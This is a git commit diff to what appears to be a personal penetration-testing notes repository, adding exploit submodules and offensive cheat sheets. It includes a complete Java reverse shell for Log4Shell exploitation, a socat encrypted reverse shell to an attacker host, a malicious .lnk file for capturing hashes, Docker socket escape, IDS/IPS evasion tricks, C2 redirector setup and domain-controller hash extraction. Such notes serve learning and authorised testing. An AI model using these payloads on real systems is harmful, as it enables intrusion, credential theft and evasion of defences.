This commit is contained in:
Stefan Friese 2022-03-10 01:31:54 +01:00
parent 32fa6a672b
commit a3a6f09472
19 changed files with 333 additions and 7 deletions

21
.gitmodules vendored
View File

@ -139,3 +139,24 @@
[submodule "exploit/windows/printspoofer"] [submodule "exploit/windows/printspoofer"]
path = exploit/windows/printspoofer path = exploit/windows/printspoofer
url = https://github.com/dievus/printspoofer.git url = https://github.com/dievus/printspoofer.git
[submodule "post_exploitation/powershell"]
path = post_exploitation/powershell
url = https://github.com/puckiestyle/powershell.git
[submodule "enumeration/network_scanners/kotlin-port-scanner"]
path = enumeration/network_scanners/kotlin-port-scanner
url = https://github.com/Hydragyrum/kotlin-port-scanner.git
[submodule "exploit/macOS/ds_store_exp"]
path = exploit/macOS/ds_store_exp
url = https://github.com/lijiejie/ds_store_exp.git
[submodule "exploit/macOS/DS_Store_crawler_parser"]
path = exploit/macOS/DS_Store_crawler_parser
url = https://github.com/anantshri/DS_Store_crawler_parser.git
[submodule "exploit/macOS/Python-dsstore"]
path = exploit/macOS/Python-dsstore
url = https://github.com/gehaxelt/Python-dsstore.git
[submodule "post_exploitation/armitage"]
path = post_exploitation/armitage
url = https://gitlab.com/kalilinux/packages/armitage.git
[submodule "exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit"]
path = exploit/linux/dirty_pipe/CVE-2022-0847-dirty-pipe-exploit
url = https://github.com/cspshivam/CVE-2022-0847-dirty-pipe-exploit.git

15
enumeration/docs/ldap.md Normal file
View File

@ -0,0 +1,15 @@
# LDAP
## Get Domain
```sh
ldapsearch -x -h $TARGET_IP -s base namingcontexts
```
## Domain Dump
* If a set of credentials are known via
```sh
ldapdomaindump $TARGET_IP -u '<domain>\<user>' -p '<password>' --no-json --no-grep
```
* Take a look at the genreated HTML files

@ -0,0 +1 @@
Subproject commit 54bfab4c7cd09f9a6d50280af00f1984d5430a1e

View File

@ -1,6 +1,11 @@
# Evil-winrm # Evil-winrm
* Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp` * Put the stuff to download into a writeable/readable directory like `C:\Windows\Temp`
```sh ```sh
download C:\Windows\Temp\<file> download C:\Windows\Temp\<file>
``` ```
* The other way
```
upload yadayda
```

View File

@ -37,7 +37,7 @@ X-Api-Version: ${jndi:ldap://$ATTACKER_IP:1389/foo}
* A Proxy LDAP server to an HTTP server is needed * A Proxy LDAP server to an HTTP server is needed
* Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class * Compile following Java reverse shell via `javac Exploit.java -source 8 -target 8` to Exploit.class
```sh ```java
public class Exploit { public class Exploit {
static { static {
try { try {
@ -48,12 +48,52 @@ public class Exploit {
} }
} }
``` ```
or another one
```java
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class Exploit {
static {
String host = "$ATTACKER_IP";
int port = 4711;
String cmd = "/bin/sh";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {
}
}
p.destroy();
s.close();
} catch (Exception e) {
}
}
}
```
* Run the LDAP, HTTP and reverse shell * Run the LDAP, HTTP and reverse shell
```sh ```sh
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit" java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://$ATTACKER_IP:8000/#Exploit"
``` ```
```sh ```sh
php -S 0.0.0.:8000 php -S 0.0.0.0:8000
``` ```
```sh ```sh
nc -lvnp 4449 nc -lvnp 4449

@ -0,0 +1 @@
Subproject commit e1fd1f65caa686bbb1510ae07efbdc3a0e4b8330

@ -0,0 +1 @@
Subproject commit 9e003a3196570a8e882e55cf9824fd3bf98886be

@ -0,0 +1 @@
Subproject commit 859781b834244774cb509e96ccc29ee646f72739

@ -0,0 +1 @@
Subproject commit 784eada6cd08739032b7fdc124a8c93abcb0c2f7

View File

@ -0,0 +1,14 @@
# .lnk exploit
* [Trendmicro's article](https://www.trendmicro.com/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
* [mamachine's tool](http://mamachine.org/mslink/index.en.html)
* Target does not even have to open the link directly
```sh
mslink_v1.3.sh -l notimportant -n shortcut -i \\\\$ATTACKER_IP\\yo -o shortcut.lnk
```
* Start a responder and wait for user's hash
```sh
responder -I eth0
```

57
misc/hadoop.md Normal file
View File

@ -0,0 +1,57 @@
# Hadoop
Distributed storage and computing
* [Hadoop Attack Libs](https://github.com/wavestone-cdt/hadoop-attack-library.git)
## Terminology
* __Cluster__, forms the datalake
* __Node__, single host inside the cluster
* __NameNode__, node that keeps the dir tree of the Hadoop file system
* __DataNode__, slave node that stores files and is instructed by the NameNode
* __Primary NameNode__, current active node responsible for keeping the directory structure
* __Secondary NameNode__, hot standby for Primary NameNode. There may be multiple on standby inside the cluster
* __Master Node__, Hadoop management app like HDFS or YARN Manager
* __Slave Node__, Hadoop worker like HDFS or MapReduce. a node can be master and slave at the same time
* __Edge Node__, hosting Hadoop user app like Zeppelin or Hue
* __Kerberised__, security enabled cluster through Kerberos
* __HDFS__, Hadoop Distributed File System, storage device for unstructured data
* __Hive__, primary DB for structured data
* __YARN__, scheduling jobs and resource management
* __MapReduce__, distributed filtering, sorting and reducing
* __HUE__, GUI for HDFS and Hive
* __Zookeeper__, cluster management
* __Kafka__, message broker
* __Ranger__, privileged ACL
* __Zeppelin__, data analytivs inside a webUI
## Zeppelin
* Try [default logins](https://zeppelin.apache.org/docs/0.8.2/setup/security/shiro_authentication.html#4-login)
* Try execution inside notebooks
## Ktabs
* Finding `ktpass`es to authenticate at the kerberos TGS
* Output principals and use them to init
```sh
klist -k <keytabfile>
kinit <prinicpal name> -k -V -t <keytabfile>
```
## HDFS
* User the `hdfs` utility to enumerate the distributed network storage
```sh
hdfs dfs -ls /
```
* Current user and user on the storage do not have to correspond
* Touched files on the storage may be owned by root
```sh
hdfs dfs -touchz testfile /tmp/testfile
hdfs dfs -ls /tmp
```
* Impersonate by sourcing keytab file of the user, __NodeManager__ is the highest user in regards to permission

View File

@ -125,7 +125,20 @@ curl -X POST -H "Content-Type: application/json" --unix-socket /var/run/docker.s
```sh ```sh
curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start curl-amd64 -X POST -H "Content-Type:application/json" --unix-socket /var/run/docker.sock http://localhost/containers/<ID>/start
``` ```
* Login in to the host via ssh * Login in to the host via ssh remotely or socat locally
```sh
socat - UNIX-CONNECT:/var/run/docker.sock
POST /containers/<CONTAINERID>/attach?stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
Host:
Connection: Upgrade
Upgrade: tcp
HTTP/1.1 101 UPGRADED
Content-Type: application/vnd.docker.raw-stream
Connection: Upgrade
Upgrade: tcp
```
## Escape through DB ## Escape through DB
* Login into DB * Login into DB

View File

@ -60,6 +60,10 @@ cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<J
```sh ```sh
puttygen <keyfile> -o key.ppk puttygen <keyfile> -o key.ppk
``` ```
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)
```sh
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
```
### Socat ### Socat
* Reverse shell on target via * Reverse shell on target via

@ -0,0 +1 @@
Subproject commit d07b0227e9ba0dc6de0c688a44ed17803c5216c6

View File

@ -2,3 +2,44 @@
* [Matrix](https://www.thec2matrix.com/) * [Matrix](https://www.thec2matrix.com/)
* [bcsecurity](https://www.bc-security.org/) maintains Empire 4 * [bcsecurity](https://www.bc-security.org/) maintains Empire 4
* [Empire](https://github.com/BC-SECURITY/Empire.git)
* [Armitage](https://gitlab.com/kalilinux/packages/armitage.git)
* [Covenant](https://github.com/cobbr/Covenant)
* [Sliver](https://github.com/BishopFox/sliver)
* Server
* Listener
* Payloads/Agents
* Staged/Dropper
* Stageless
* Beacons from Agents, disguised through jitter
* Modules
* Post Exploitation
* Pivoting
## Domain Fronting
* Use a Domain on the C2 server
* User Cloudflare to proxy the request and responses to and from the target
* Use HTTPs for channel encryption
## Profiles
* Server evaluates by custom user-agents to identify agents
## Types
* Std listener, TCP or UDP
* HTTP/HTTPS, counter FW
* DNS, if internet access of the target is flaky
* SMB, counter network segments
## Redirector
* Apache or nginx as reverse proxy in front of the c2 server
* FW is still needed in front of the redirector
* These get burned instead of the c2

View File

@ -0,0 +1,79 @@
# IDS & IPS Evation
* Evation by manipulation of
* Protocol
* Payload
* Route
* Or DoS
## Protocol Manipulation
### Relying on another protocol
* `nc -ulvnp 4711` for listening to incoming UDP traffic
* `nc -u $TARGET_IP $TARGET_PORT` for connecting through UDP
### Manipulation of the source's or LHOST's network port
* `nmap -g 80` or `nmap --source-port 53` to send outgoing nmap traffic through it
### Session splicing by fragmentation and segmentation
* `nmap` fragmentation in 8 bytes `-f`, 16 bytes `-ff`, `--mtu <size>` for MTU
* Use [Fragroute](https://www.monkey.org/~dugsong/fragroute/) with `ip_frag <num>` in `fragroute.conf`, then use `fragroute -f fragroute.conf $TARGET_IP`
### Sending invalid packets
* Invalid protocol header flags and checksums via`nmap --badsum`, `nmap --scanflags URG/ACK/PSH/RST/SYN/FIN`, e.g. concatentation of multiple flags `nmap --scanflags SYNRSTFIN`
* `hping3` including `--ttl`, `--badsum`, header flags `-S`,`-A`,`-P`,`-U`,`-F`,`-R`
## Payload Manipulation
### Obfuscation and Encoding
* Base64
* URL
* Escaped Unicode Characters
### Encrypting Communication Channels
* Use socat with encryption
```sh
openssl req -x509 -newkey rsa:2048 -days 356 -subj '/CN=www.example.com/O=YO/C=FR' -nodes -keyout id_rsa.key -out reverse.crt
```
* Create `.pem` (Privacy Enhanced Mail) file via
```
cat id_rsa.key reverse.crt > reverse.pem
```
* Listening on attacker side
```sh
socat -d -d OPENSSL-LISTEN:4711,cert=reverse.pem,verify=0,fork STDOUT
```
* On target
```sh
socat OPENSSL:$ATTACKER_IP:4711,verify=0 EXEC:/bin/bash
```
### Modification of Data
* Order of parameters, instead of `nc -lvnp` it is `nc -vpnl`
* Adding whitespaces to the commands
* Use aliases
## Route Manipulation
### Relying on Source Routing
* `nmap --ip-options "L 10.10.20.30 10.10.30.40` routes through these IPs loosely
* `nmap --ip-options "S 10.10.20.30 10.10.30.40"` routes through the IPs strictly
### Using Proxyy Servers
* `nmap -sS http://$PROXY1:80,socks4://$PROXY:8080 $TARGET_IP`
## Tactical DoS
* Non malicious, benign traffic against
* IDS/IPS
* Logging server
## MISC
* Changing
* `User-Agent`
* Request frequency and duration of sleep
* SSL/TLS certs
* DNS beacon, storing exfiltrated data in the query

View File

@ -58,3 +58,33 @@ set PAYLOAD windows/meterpreter/reverse_http
run -j run -j
``` ```
* Copy into powershell/cmd * Copy into powershell/cmd
## Reverse Proxy
* Hide behind reverse proxy, e.g. apache
* In case of an apache, these modules must be enabled
* rewrite
* proxy
* proxy_http
* headers
* Use `User-Agent` to identify targets
```ucl
<VirtualHost *:80>
ServerAdmin webmaster@localhost
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "^User-Agent$"
ProxyPass "/" "http://localhost:8080/"
<Directory>
AllowOverride All
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```

View File

@ -6,21 +6,21 @@
* Check `whoami /all` * Check `whoami /all`
* `SeBackupPrivilege` must be present * `SeBackupPrivilege` must be present
* [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary) * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
* Upload `diskshadow.txt` to the target with the following content * Upload `diskshadow.txt` to the target with the following content, there has to be a space at the end of each line!!!!
```sh ```sh
set metadata C:\tmp\tmp.cabs set metadata C:\tmp\tmp.cabs
set context persistent nowriters set context persistent nowriters
add volume c: alias someAlias add volume c: alias someAlias
create create
expose %someAlias% h: expose %someAlias% h:
``` ```
* Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt` * Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\tmp\diskshadow.txt`
* Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
```sh ```sh
import-module .\SeBackupPrivilegeUtils.dll import-module .\SeBackupPrivilegeUtils.dll
import-module .\SeBackupPrivilegeCmdLets.dll import-module .\SeBackupPrivilegeCmdLets.dll
copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
reg save HKLM\SYSTEM C:\Path\to\uploads\system reg save HKLM\SYSTEM C:\tmp\system
``` ```
* Downloads the files `ntds.dit` and `system` * Downloads the files `ntds.dit` and `system`
* Extract the hashes via * Extract the hashes via

@ -0,0 +1 @@
Subproject commit 81e5fba23f24fb74eaabeeb8665c9f9dff4c535b